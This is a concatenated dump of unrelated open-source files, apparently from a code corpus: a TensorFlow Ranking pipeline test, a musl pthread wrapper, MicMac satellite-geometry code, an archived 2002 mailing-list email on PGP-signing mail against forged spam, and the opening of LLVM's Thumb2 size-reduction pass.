num_epochs=2,
steps_per_epoch=5,
validation_steps=2,
learning_rate=0.01,
loss="softmax_loss",
export_best_model=True,
automatic_reduce_lr=True,
strategy=strategy)
context_feature_spec = {
"cf_1":
tf.io.FixedLenFeature(
shape=(1,), dtype=tf.float32, default_value=0.0),
}
example_feature_spec = {
"custom_features_{}".format(i + 1):
tf.io.FixedLenFeature(shape=(1,), dtype=tf.float32, default_value=0.0)
for i in range(3)
}
label_spec = (_LABEL_FEATURE,
tf.io.FixedLenFeature(
shape=(1,),
dtype=tf.float32,
default_value=_PADDING_LABEL))
dnn_scorer = model_lib.DNNScorer(hidden_layer_dims=[16, 8], output_units=1)
model_builder = model_lib.ModelBuilder(
input_creator=model_lib.FeatureSpecInputCreator(context_feature_spec,
example_feature_spec),
preprocessor=model_lib.PreprocessorWithSpec({}),
scorer=dnn_scorer,
mask_feature_name=_MASK,
name="test_model",
)
ranking_pipeline = pipeline.SimplePipeline(
model_builder,
dataset_builder=pipeline.SimpleDatasetBuilder(
context_feature_spec,
example_feature_spec,
_MASK,
label_spec,
dataset_hparams),
hparams=pipeline_hparams)
ranking_pipeline.train_and_validate(verbose=1)
latest_model_path = os.path.join(model_dir, "export/latest_model")
self.assertTrue(tf.saved_model.contains_saved_model(latest_model_path))
latest_model = tf.saved_model.load(export_dir=latest_model_path)
listwise_predictor = latest_model.signatures[
tf.saved_model.PREDICT_METHOD_NAME]
listwise_logits = listwise_predictor(
tf.convert_to_tensor([ELWC.SerializeToString()] *
2))[tf.saved_model.PREDICT_OUTPUTS]
self.assertAllEqual([2, 2], listwise_logits.get_shape().as_list())
pointwise_predictor = latest_model.signatures[
tf.saved_model.REGRESS_METHOD_NAME]
pointwise_logits = pointwise_predictor(
tf.convert_to_tensor([
EXAMPLE_PROTO_1.SerializeToString(),
EXAMPLE_PROTO_2.SerializeToString()
]))[tf.saved_model.REGRESS_OUTPUTS]
self.assertAllEqual([2], pointwise_logits.get_shape().as_list())
self.assertAllClose(pointwise_logits, listwise_logits[0])
def test_pipeline_with_multi_task(self):
data_dir = self.create_tempdir()
data_file = os.path.join(data_dir, "elwc.tfrecord")
if tf.io.gfile.exists(data_file):
tf.io.gfile.remove(data_file)
with tf.io.TFRecordWriter(data_file) as writer:
for _ in range(256):
writer.write(ELWC.SerializeToString())
model_dir = os.path.join(data_dir, "model")
dataset_hparams = pipeline.DatasetHparams(
train_input_pattern=data_file,
valid_input_pattern=data_file,
train_batch_size=128,
valid_batch_size=128,
list_size=2,
dataset_reader=tf.data.TFRecordDataset,
convert_labels_to_binary=False)
pipeline_hparams = pipeline.PipelineHparams(
model_dir=model_dir,
num_epochs=2,
steps_per_epoch=5,
validation_steps=2,
learning_rate=0.01,
loss={
"task1": "softmax_loss",
"task2": "pairwise_logistic_loss"
},
loss_weights={
"task1": 1.0,
"task2": 2.0
},
export_best_model=True,
strategy="MirroredStrategy")
context_feature_spec = {
"cf_1":
tf.io.FixedLenFeature(
shape=(1,), dtype=tf.float32, default_value=0.0),
}
example_feature_spec = {
"custom_features_{}".format(i + 1):
tf.io.FixedLenFeature(shape=(1,), dtype=tf.float32, default_value=0.0)
for i in range(3)
}
label_spec = (_LABEL_FEATURE,
tf.io.FixedLenFeature(
shape=(1,),
dtype=tf.float32,
default_value=_PADDING_LABEL))
label_spec = {"task1": label_spec, "task2": label_spec}
weight_spec = ("weight",
tf.io.FixedLenFeature(
shape=(1,), dtype=tf.float32, default_value=1.))
model_builder = model_lib.ModelBuilder(
input_creator=model_lib.FeatureSpecInputCreator(context_feature_spec,
example_feature_spec),
preprocessor=model_lib.PreprocessorWithSpec({}),
scorer=DummyMultiTaskScorer(),
mask_feature_name=_MASK,
name="multi_task_model",
)
ranking_pipeline = pipeline.MultiTaskPipeline(
model_builder,
dataset_builder=pipeline.MultiLabelDatasetBuilder(
context_feature_spec,
example_feature_spec,
_MASK,
label_spec,
dataset_hparams,
sample_weight_spec=weight_spec),
hparams=pipeline_hparams)
ranking_pipeline.train_and_validate(verbose=1)
latest_model_path = os.path.join(model_dir, "export/latest_model")
self.assertTrue(tf.saved_model.contains_saved_model(latest_model_path))
latest_model = tf.saved_model.load(export_dir=latest_model_path)
listwise_predictor = latest_model.signatures[
tf.saved_model.PREDICT_METHOD_NAME]
listwise_logits = listwise_predictor(
tf.convert_to_tensor([ELWC.SerializeToString()] * 2))["task1"]
self.assertAllEqual([2, 2], listwise_logits.get_shape().as_list())
pointwise_predictor = latest_model.signatures[
tf.saved_model.REGRESS_METHOD_NAME]
pointwise_logits = pointwise_predictor(
tf.convert_to_tensor([
EXAMPLE_PROTO_1.SerializeToString(),
EXAMPLE_PROTO_2.SerializeToString()
]))["task1"]
self.assertAllEqual([2], pointwise_logits.get_shape().as_list())
self.assertAllClose(pointwise_logits, listwise_logits[0])
if __name__ == "__main__":
tf.test.main()
| 4,973 |
12,718 | <gh_stars>1000+
#include "pthread_impl.h"
int __pthread_rwlock_rdlock(pthread_rwlock_t *rw)
{
return __pthread_rwlock_timedrdlock(rw, 0);
}
weak_alias(__pthread_rwlock_rdlock, pthread_rwlock_rdlock);
| 90 |
451 | <gh_stars>100-1000
/*Header-MicMac-eLiSe-25/06/2007
MicMac : Multi Image Correspondances par Methodes Automatiques de Correlation
eLiSe : ELements of an Image Software Environnement
www.micmac.ign.fr
Copyright : Institut Geographique National
Author : <NAME>
Contributors : <NAME>, <NAME>.
[1] <NAME>, <NAME>.
"A multiresolution and optimization-based image matching approach:
An application to surface reconstruction from SPOT5-HRS stereo imagery."
In IAPRS vol XXXVI-1/W41 in ISPRS Workshop On Topographic Mapping From Space
(With Special Emphasis on Small Satellites), Ankara, Turquie, 02-2006.
[2] <NAME>, "MicMac, un lociel de mise en correspondance
d'images, adapte au contexte geograhique" to appears in
Bulletin d'information de l'Institut Geographique National, 2007.
Francais :
MicMac est un logiciel de mise en correspondance d'image adapte
au contexte de recherche en information geographique. Il s'appuie sur
la bibliotheque de manipulation d'image eLiSe. Il est distibue sous la
licences Cecill-B. Voir en bas de fichier et http://www.cecill.info.
English :
MicMac is an open source software specialized in image matching
for research in geographic information. MicMac is built on the
eLiSe image library. MicMac is governed by the "Cecill-B licence".
See below and http://www.cecill.info.
Header-MicMac-eLiSe-25/06/2007*/
#include "SatPhysMod.h"
/**********************************************************************/
/* */
/* cPushB_GeomLine */
/* */
/**********************************************************************/
cPushB_GeomLine::cPushB_GeomLine(const cPushB_PhysMod * aPBPM,int aNbSampleX,double anY) :
mPBPM (aPBPM),
mNbX (aNbSampleX),
mY (anY),
mPlanRay (Pt3dr(0,0,0),Pt3dr(1,0,0),Pt3dr(0,1,0))
{
// Computation of segments and centers
std::vector<ElSeg3D> aVSeg;
bool Ok;
for (int aKS=0 ; aKS<=aNbSampleX ; aKS++)
{
aVSeg.push_back(mPBPM->Im2GeoC(PIm(aKS)));
}
mCenter = InterSeg(aVSeg,Ok);
mCUnRot = mCenter;
double aSomD=0;
mMaxResInt = 0;
Pt3dr aSpeed = vunit(aPBPM->Rough_GroundSpeed(anY));
// Computation of directions
std::vector<Pt3dr> aVDirOrient;
{
std::vector<Pt3dr> aVDirCalcPlan;
for (int aKS=0 ; aKS<int(aVSeg.size()) ; aKS++)
{
double aDist = aVSeg[aKS].DistDoite(mCenter);
aSomD += aDist;
ElSetMax(mMaxResInt,aDist);
Pt3dr aDir = vunit(aVSeg[aKS].Mil()-mCenter);
aVDirOrient.push_back(aDir);
// we want to enforce the fact that the plane contains (0,0,0) so we add P and -P
// to this observation
aVDirCalcPlan.push_back(aDir);
aVDirCalcPlan.push_back(-aDir);
}
mPlanRay = cElPlan3D(aVDirCalcPlan,0);
}
mResInt = aSomD / aVSeg.size();
// R=CoordPlan2Euclid() affine rotation such that, if P is in plane coordinates
// R(P) is in global coordinates;
ElRotation3D aRe2p = mPlanRay.CoordPlan2Euclid().inv();
mAxeY = mPlanRay.Norm();
if (scal(aSpeed,mAxeY) < 0)
mAxeY = -mAxeY;
// Pt3dr aX0 = vunit(mPlanRay.Proj(aRe2p.ImAff(aVDirPlan[aVSeg.size()/2])));
int aK0 = (int)(aVSeg.size() / 2);
mAxeZ = DirOnPlan(aVDirOrient[aK0]);
mAxeX = vunit(mAxeY ^mAxeZ);
mMoyDistPlan = 0.0;
mMaxDistPlan = 0.0;
double aTetaMoy = 0.0;
for (int aKS=0 ; aKS<int(aVSeg.size()) ; aKS++)
{
Pt3dr aD = aVDirOrient[aKS];
double aDPlan = ElAbs(scal(mAxeY,aD));
mMoyDistPlan += aDPlan;
ElSetMax(mMaxDistPlan,aDPlan);
Pt3dr aProjDir = DirOnPlan(aD);
double aScalZ = ElMax(-1.0,ElMin(1.0,scal(mAxeZ,aProjDir)));
double aScalX = ElMax(-1.0,ElMin(1.0,scal(mAxeX,aProjDir)));
double aTeta = atan2(aScalX,aScalZ);
aTetaMoy += aTeta;
}
aTetaMoy /= aVSeg.size();
mAxeZ = DirOnPlan(mAxeZ*cos(aTetaMoy) + mAxeX * sin(aTetaMoy));
mAxeX = vunit(mAxeY ^mAxeZ);
mMoyDistPlan /= aVSeg.size();
for (int aKS=0 ; aKS<int(aVSeg.size()) ; aKS++)
{
Pt3dr aD = DirOnPlan(aVDirOrient[aKS]);
double aZ = scal(mAxeZ,aD);
double aX = scal(mAxeX,aD);
mCalib.push_back(aX/aZ);
}
}
// compute the projection of P on mPlanRay, then make it a unit vector
Pt3dr cPushB_GeomLine::DirOnPlan(const Pt3dr & aP) const
{
return vunit(mPlanRay.Proj(aP));
}
ElMatrix<double> cPushB_GeomLine::MatC2M() const
{
return MatFromCol(mAxeX,mAxeY,mAxeZ);
}
ElMatrix<double> cPushB_GeomLine::MatC1ToC2(cPushB_GeomLine & aCam2) const
{
return aCam2.MatC2M().transpose() * MatC2M();
}
double cPushB_GeomLine::XIm(int aKx) const
{
return (double(mPBPM->SwapXY() ? mPBPM->Sz().y : mPBPM->Sz().x) * (aKx+0.5) )/(mNbX+1);
}
Pt2dr cPushB_GeomLine::PIm(int aKx) const
{
return mPBPM->SwapXY() ? Pt2dr(mY,XIm(aKx)) : Pt2dr(XIm(aKx),mY) ;
}
const Pt3dr & cPushB_GeomLine::Center() const {return mCenter;}
const double & cPushB_GeomLine::MoyResiduCenter() const {return mResInt;}
const double & cPushB_GeomLine::MaxResiduCenter() const {return mMaxResInt;}
const double & cPushB_GeomLine::MoyDistPlan() const {return mMoyDistPlan;}
const double & cPushB_GeomLine::MaxDistPlan() const {return mMaxDistPlan;}
const Pt3dr & cPushB_GeomLine::CUnRot() const {return mCUnRot;}
Pt3dr & cPushB_GeomLine::CUnRot() {return mCUnRot;}
const std::vector<double> cPushB_GeomLine::Calib() const {return mCalib;}
/*Footer-MicMac-eLiSe-25/06/2007
Ce logiciel est un programme informatique servant à la mise en
correspondances d'images pour la reconstruction du relief.
Ce logiciel est régi par la licence CeCILL-B soumise au droit français et
respectant les principes de diffusion des logiciels libres. Vous pouvez
utiliser, modifier et/ou redistribuer ce programme sous les conditions
de la licence CeCILL-B telle que diffusée par le CEA, le CNRS et l'INRIA
sur le site "http://www.cecill.info".
En contrepartie de l'accessibilité au code source et des droits de copie,
de modification et de redistribution accordés par cette licence, il n'est
offert aux utilisateurs qu'une garantie limitée. Pour les mêmes raisons,
seule une responsabilité restreinte pèse sur l'auteur du programme, le
titulaire des droits patrimoniaux et les concédants successifs.
A cet égard l'attention de l'utilisateur est attirée sur les risques
associés au chargement, à l'utilisation, à la modification et/ou au
développement et à la reproduction du logiciel par l'utilisateur étant
donné sa spécificité de logiciel libre, qui peut le rendre complexe à
manipuler et qui le réserve donc à des développeurs et des professionnels
avertis possédant des connaissances informatiques approfondies. Les
utilisateurs sont donc invités à charger et tester l'adéquation du
logiciel à leurs besoins dans des conditions permettant d'assurer la
sécurité de leurs systèmes et ou de leurs données et, plus généralement,
à l'utiliser et l'exploiter dans les mêmes conditions de sécurité.
Le fait que vous puissiez accéder à cet en-tête signifie que vous avez
pris connaissance de la licence CeCILL-B, et que vous en avez accepté les
termes.
Footer-MicMac-eLiSe-25/06/2007*/
| 3,329 |
3,428 | {"id":"01014","group":"easy-ham-2","checksum":{"type":"MD5","value":"d86f7cf4bda937a58e7af5aef3f71649"},"text":"From <EMAIL> Mon Aug 12 11:11:29 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: yyyy<EMAIL>.netnoteinc.com\nReceived: from localhost (localhost [127.0.0.1])\n\tby phobos.labs.netnoteinc.com (Postfix) with ESMTP id 2AF374417C\n\tfor <jm@localhost>; Mon, 12 Aug 2002 05:57:18 -0400 (EDT)\nReceived: from phobos [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Mon, 12 Aug 2002 10:57:18 +0100 (IST)\nReceived: from xent.com ([64.161.22.236]) by dogma.slashnull.org\n (8.11.6/8.11.6) with ESMTP id g7BMpob17088 for <<EMAIL>>;\n Sun, 11 Aug 2002 23:51:51 +0100\nReceived: from lair.xent.com (localhost [127.0.0.1]) by xent.com (Postfix)\n with ESMTP id 560D5294190; Sun, 11 Aug 2002 15:50:07 -0700 (PDT)\nDelivered-To: <EMAIL>\nReceived: from tux.w3.org (tux.w3.org [18.29.0.27]) by xent.com (Postfix)\n with ESMTP id 23EDB294142 for <<EMAIL>>; Sun, 11 Aug 2002 15:49:49\n -0700 (PDT)\nReceived: from w3.org (IDENT:[email protected] [18.29.0.27]) by tux.w3.org\n (8.9.3/8.9.3) with ESMTP id SAA15363; Sun, 11 Aug 2002 18:50:50 -0400\nMessage-Id: <<EMAIL>>\nFrom: <NAME> <<EMAIL>>\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1a) Gecko/20020610\nX-Accept-Language: en-us, en\nMIME-Version: 1.0\nTo: <NAME> <<EMAIL>>\nCc: fork <<EMAIL>>\nSubject: Re: Forged whitelist spam\nReferences: <Pine.LNX.4.33.0208111330190.398<EMAIL>>\n <005301c24179$ac92b820$640a000a@golden>\nX-Enigmail-Version: 0.63.3.0\nX-Enigmail-Supports: pgp-inline, pgp-mime\nContent-Type: text/plain; charset=us-ascii; format=flowed\nContent-Transfer-Encoding: 7bit\nSender: fork-<EMAIL>\nErrors-To: fork-admin<EMAIL>.com\nX-Beenthere: <EMAIL>assassin.taint.org\nX-Mailman-Version: 2.0.11\nPrecedence: bulk\nList-Help: <mailto:<EMAIL>?subject=help>\nList-Post: <mailto:<EMAIL>>\nList-Subscribe: <http://xent.com/mailman/listinfo/fork>, <mailto:<EMAIL>?subject=subscribe>\nList-Id: Friends of <NAME> <fork.xent.com>\nList-Unsubscribe: <http://xent.com/mailman/listinfo/fork>,\n <mailto:<EMAIL>?subject=unsubscribe>\nList-Archive: <http://xent.com/pipermail/fork/>\nDate: Sun, 11 Aug 2002 23:15:58 +0000\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n<NAME> wrote:\n> <NAME> writes:\n> \n>>On Sun, 11 Aug 2002, <NAME> wrote:\n>>\n>>>If you crypto-sign your outgoing mail, you don't have to set your\n>>>mailwall whitelist to accept unsigned mail spoofed as being from you.\n\nYup, I've been meaning to cobble together procmail + script for this, as \na few Google searches didn't turn up anything. Did anyone here get there \nfirst?\n\n(I guess I want a config file of mailboxes who normally sign their mail, \nand procmail that runs gpg and adds headers...)\n\n>>Users don't like entering passphrases when sending email. USB fobs, smart \n>>cards or other removable hardware are not yet widespread.\n> \n> Bad assumption.\n> \n> A reasonable UI would have me enter my passphrase *at most* each \n> time I launch my mail program -- never more than once per day,\n> sometimes once per week. \n\nFWIW, the 'Enigmail' add-on for Mozilla's mail client has it happily \ntalking to GPG (and I believe PGP). You can choose how long it remembers \nyour passphrase for, default is 15 mins.\n\nsee http://enigmail.mozdev.org/\n\nThis feature was enough to get my off my Pine habit, since (to answer \nthe original question) the combination of SpamAssassin and shared \nwhitelists means that forged 'From:' headers are pretty much the only \nspam I see in my inbox now.\n\nDan\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQE9VvAyPhXvL3Mij+QRAkDdAJ4m/LO7Y0aki66H5AIwbmsX8Q/PegCfSQgI\nZW2XmlcnQtrzALPimthvlr8=\n=wdf/\n-----END PGP SIGNATURE-----\n\nhttp://xent.com/mailman/listinfo/fork\n\n\n"} | 1,594 |
2,338 | //===-- Thumb2SizeReduction.cpp - Thumb2 code size reduction pass -*- C++ -*-=//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "ARM.h"
#include "ARMBaseInstrInfo.h"
#include "ARMSubtarget.h"
#include "MCTargetDesc/ARMBaseInfo.h"
#include "Thumb2InstrInfo.h"
#include "llvm/ADT/DenseMap.h"
#include "llvm/ADT/PostOrderIterator.h"
#include "llvm/ADT/STLExtras.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/Statistic.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/CodeGen/MachineBasicBlock.h"
#include "llvm/CodeGen/MachineFunction.h"
#include "llvm/CodeGen/MachineFunctionPass.h"
#include "llvm/CodeGen/MachineInstr.h"
#include "llvm/CodeGen/MachineInstrBuilder.h"
#include "llvm/CodeGen/MachineOperand.h"
#include "llvm/CodeGen/TargetInstrInfo.h"
#include "llvm/IR/DebugLoc.h"
#include "llvm/IR/Function.h"
#include "llvm/MC/MCInstrDesc.h"
#include "llvm/MC/MCRegisterInfo.h"
#include "llvm/Support/CommandLine.h"
#include "llvm/Support/Compiler.h"
#include "llvm/Support/Debug.h"
#include "llvm/Support/ErrorHandling.h"
#include "llvm/Support/raw_ostream.h"
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <functional>
#include <iterator>
#include <utility>
using namespace llvm;
#define DEBUG_TYPE "thumb2-reduce-size"
#define THUMB2_SIZE_REDUCE_NAME "Thumb2 instruction size reduce pass"
STATISTIC(NumNarrows, "Number of 32-bit instrs reduced to 16-bit ones");
STATISTIC(Num2Addrs, "Number of 32-bit instrs reduced to 2addr 16-bit ones");
STATISTIC(NumLdSts, "Number of 32-bit load / store reduced to 16-bit ones");
static cl::opt<int> ReduceLimit("t2-reduce-limit",
cl::init(-1), cl::Hidden);
static cl::opt<int> ReduceLimit2Addr("t2-reduce-limit2",
cl::init(-1), cl::Hidden);
static cl::opt<int> ReduceLimitLdSt("t2-reduce-limit3",
cl::init(-1), cl::Hidden);
namespace {
/// ReduceTable - A static table with information on mapping from wide
/// opcodes to narrow
struct ReduceEntry {
uint16_t WideOpc; // Wide opcode
uint16_t NarrowOpc1; // Narrow opcode to transform to
uint16_t NarrowOpc2; // Narrow opcode when it's two-address
uint8_t Imm1Limit; // Limit of immediate field (bits)
uint8_t Imm2Limit; // Limit of immediate field when it's two-address
unsigned LowRegs1 : 1; // Only possible if low-registers are used
unsigned LowRegs2 : 1; // Only possible if low-registers are used (2addr)
unsigned PredCC1 : 2; // 0 - If predicated, cc is on and vice versa.
// 1 - No cc field.
// 2 - Always set CPSR.
unsigned PredCC2 : 2;
unsigned PartFlag : 1; // 16-bit instruction does partial flag update
unsigned Special : 1; // Needs to be dealt with specially
unsigned AvoidMovs: 1; // Avoid movs with shifter operand (for Swift)
};
static const ReduceEntry ReduceTable[] = {
// Wide, Narrow1, Narrow2, imm1,imm2, lo1, lo2, P/C,PF,S,AM
{ ARM::t2ADCrr, 0, ARM::tADC, 0, 0, 0, 1, 0,0, 0,0,0 },
{ ARM::t2ADDri, ARM::tADDi3, ARM::tADDi8, 3, 8, 1, 1, 0,0, 0,1,0 },
{ ARM::t2ADDrr, ARM::tADDrr, ARM::tADDhirr, 0, 0, 1, 0, 0,1, 0,0,0 },
{ ARM::t2ADDSri,ARM::tADDi3, ARM::tADDi8, 3, 8, 1, 1, 2,2, 0,1,0 },
{ ARM::t2ADDSrr,ARM::tADDrr, 0, 0, 0, 1, 0, 2,0, 0,1,0 },
{ ARM::t2ANDrr, 0, ARM::tAND, 0, 0, 0, 1, 0,0, 1,0,0 },
{ ARM::t2ASRri, ARM::tASRri, 0, 5, 0, 1, 0, 0,0, 1,0,1 },
{ ARM::t2ASRrr, 0, ARM::tASRrr, 0, 0, 0, 1, 0,0, 1,0,1 },
{ ARM::t2BICrr, 0, ARM::tBIC, 0, 0, 0, 1, 0,0, 1,0,0 },
//FIXME: Disable CMN, as CCodes are backwards from compare expectations
//{ ARM::t2CMNrr, ARM::tCMN, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
{ ARM::t2CMNzrr, ARM::tCMNz, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
{ ARM::t2CMPri, ARM::tCMPi8, 0, 8, 0, 1, 0, 2,0, 0,0,0 },
{ ARM::t2CMPrr, ARM::tCMPhir, 0, 0, 0, 0, 0, 2,0, 0,1,0 },
{ ARM::t2EORrr, 0, ARM::tEOR, 0, 0, 0, 1, 0,0, 1,0,0 },
// FIXME: adr.n immediate offset must be multiple of 4.
//{ ARM::t2LEApcrelJT,ARM::tLEApcrelJT, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
{ ARM::t2LSLri, ARM::tLSLri, 0, 5, 0, 1, 0, 0,0, 1,0,1 },
{ ARM::t2LSLrr, 0, ARM::tLSLrr, 0, 0, 0, 1, 0,0, 1,0,1 },
{ ARM::t2LSRri, ARM::tLSRri, 0, 5, 0, 1, 0, 0,0, 1,0,1 },
{ ARM::t2LSRrr, 0, ARM::tLSRrr, 0, 0, 0, 1, 0,0, 1,0,1 },
{ ARM::t2MOVi, ARM::tMOVi8, 0, 8, 0, 1, 0, 0,0, 1,0,0 },
{ ARM::t2MOVi16,ARM::tMOVi8, 0, 8, 0, 1, 0, 0,0, 1,1,0 },
// FIXME: Do we need the 16-bit 'S' variant?
{ ARM::t2MOVr,ARM::tMOVr, 0, 0, 0, 0, 0, 1,0, 0,0,0 },
{ ARM::t2MUL, 0, ARM::tMUL, 0, 0, 0, 1, 0,0, 1,0,0 },
{ ARM::t2MVNr, ARM::tMVN, 0, 0, 0, 1, 0, 0,0, 0,0,0 },
{ ARM::t2ORRrr, 0, ARM::tORR, 0, 0, 0, 1, 0,0, 1,0,0 },
{ ARM::t2REV, ARM::tREV, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
{ ARM::t2REV16, ARM::tREV16, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
{ ARM::t2REVSH, ARM::tREVSH, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
{ ARM::t2RORrr, 0, ARM::tROR, 0, 0, 0, 1, 0,0, 1,0,0 },
{ ARM::t2RSBri, ARM::tRSB, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2RSBSri,ARM::tRSB, 0, 0, 0, 1, 0, 2,0, 0,1,0 },
{ ARM::t2SBCrr, 0, ARM::tSBC, 0, 0, 0, 1, 0,0, 0,0,0 },
{ ARM::t2SUBri, ARM::tSUBi3, ARM::tSUBi8, 3, 8, 1, 1, 0,0, 0,0,0 },
{ ARM::t2SUBrr, ARM::tSUBrr, 0, 0, 0, 1, 0, 0,0, 0,0,0 },
{ ARM::t2SUBSri,ARM::tSUBi3, ARM::tSUBi8, 3, 8, 1, 1, 2,2, 0,0,0 },
{ ARM::t2SUBSrr,ARM::tSUBrr, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
{ ARM::t2SXTB, ARM::tSXTB, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
{ ARM::t2SXTH, ARM::tSXTH, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
{ ARM::t2TEQrr, ARM::tEOR, 0, 0, 0, 1, 0, 2,0, 0,1,0 },
{ ARM::t2TSTrr, ARM::tTST, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
{ ARM::t2UXTB, ARM::tUXTB, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
{ ARM::t2UXTH, ARM::tUXTH, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
// FIXME: Clean this up after splitting each Thumb load / store opcode
// into multiple ones.
{ ARM::t2LDRi12,ARM::tLDRi, ARM::tLDRspi, 5, 8, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDRs, ARM::tLDRr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDRBi12,ARM::tLDRBi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDRBs, ARM::tLDRBr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDRHi12,ARM::tLDRHi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDRHs, ARM::tLDRHr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDRSBs,ARM::tLDRSB, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDRSHs,ARM::tLDRSH, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDR_POST,ARM::tLDMIA_UPD,0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2STRi12,ARM::tSTRi, ARM::tSTRspi, 5, 8, 1, 0, 0,0, 0,1,0 },
{ ARM::t2STRs, ARM::tSTRr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2STRBi12,ARM::tSTRBi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2STRBs, ARM::tSTRBr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2STRHi12,ARM::tSTRHi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2STRHs, ARM::tSTRHr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2STR_POST,ARM::tSTMIA_UPD,0, 0, 0, 1, 0, 0,0, 0,1,0 },
{ ARM::t2LDMIA, ARM::tLDMIA, 0, 0, 0, 1, 1, 1,1, 0,1,0 },
{ ARM::t2LDMIA_RET,0, ARM::tPOP_RET, 0, 0, 1, 1, 1,1, 0,1,0 },
{ ARM::t2LDMIA_UPD,ARM::tLDMIA_UPD,ARM::tPOP,0, 0, 1, 1, 1,1, 0,1,0 },
// ARM::t2STMIA (with no basereg writeback) has no Thumb1 equivalent.
// tSTMIA_UPD is a change in semantics which can only be used if the base
// register is killed. This difference is correctly handled elsewhere.
{ ARM::t2STMIA, ARM::tSTMIA_UPD, 0, 0, 0, 1, 1, 1,1, 0,1,0 },
{ ARM::t2STMIA_UPD,ARM::tSTMIA_UPD, 0, 0, 0, 1, 1, 1,1, 0,1,0 },
{ ARM::t2STMDB_UPD, 0, ARM::tPUSH, 0, 0, 1, 1, 1,1, 0,1,0 }
};
class Thumb2SizeReduce : public MachineFunctionPass {
public:
static char ID;
const Thumb2InstrInfo *TII;
const ARMSubtarget *STI;
Thumb2SizeReduce(std::function<bool(const Function &)> Ftor = nullptr);
bool runOnMachineFunction(MachineFunction &MF) override;
MachineFunctionProperties getRequiredProperties() const override {
return MachineFunctionProperties().set(
MachineFunctionProperties::Property::NoVRegs);
}
StringRef getPassName() const override {
return THUMB2_SIZE_REDUCE_NAME;
}
private:
/// ReduceOpcodeMap - Maps wide opcode to index of entry in ReduceTable.
DenseMap<unsigned, unsigned> ReduceOpcodeMap;
bool canAddPseudoFlagDep(MachineInstr *Use, bool IsSelfLoop);
bool VerifyPredAndCC(MachineInstr *MI, const ReduceEntry &Entry,
bool is2Addr, ARMCC::CondCodes Pred,
bool LiveCPSR, bool &HasCC, bool &CCDead);
bool ReduceLoadStore(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry);
bool ReduceSpecial(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry, bool LiveCPSR, bool IsSelfLoop);
/// ReduceTo2Addr - Reduce a 32-bit instruction to a 16-bit two-address
/// instruction.
bool ReduceTo2Addr(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry, bool LiveCPSR,
bool IsSelfLoop);
/// ReduceToNarrow - Reduce a 32-bit instruction to a 16-bit
/// non-two-address instruction.
bool ReduceToNarrow(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry, bool LiveCPSR,
bool IsSelfLoop);
/// ReduceMI - Attempt to reduce MI, return true on success.
bool ReduceMI(MachineBasicBlock &MBB, MachineInstr *MI,
bool LiveCPSR, bool IsSelfLoop);
/// ReduceMBB - Reduce width of instructions in the specified basic block.
bool ReduceMBB(MachineBasicBlock &MBB);
bool OptimizeSize;
bool MinimizeSize;
// Last instruction to define CPSR in the current block.
MachineInstr *CPSRDef;
// Was CPSR last defined by a high latency instruction?
// When CPSRDef is null, this refers to CPSR defs in predecessors.
bool HighLatencyCPSR;
struct MBBInfo {
// The flags leaving this block have high latency.
bool HighLatencyCPSR = false;
// Has this block been visited yet?
bool Visited = false;
MBBInfo() = default;
};
SmallVector<MBBInfo, 8> BlockInfo;
std::function<bool(const Function &)> PredicateFtor;
};
char Thumb2SizeReduce::ID = 0;
} // end anonymous namespace
INITIALIZE_PASS(Thumb2SizeReduce, DEBUG_TYPE, THUMB2_SIZE_REDUCE_NAME, false,
false)
Thumb2SizeReduce::Thumb2SizeReduce(std::function<bool(const Function &)> Ftor)
: MachineFunctionPass(ID), PredicateFtor(std::move(Ftor)) {
OptimizeSize = MinimizeSize = false;
for (unsigned i = 0, e = array_lengthof(ReduceTable); i != e; ++i) {
unsigned FromOpc = ReduceTable[i].WideOpc;
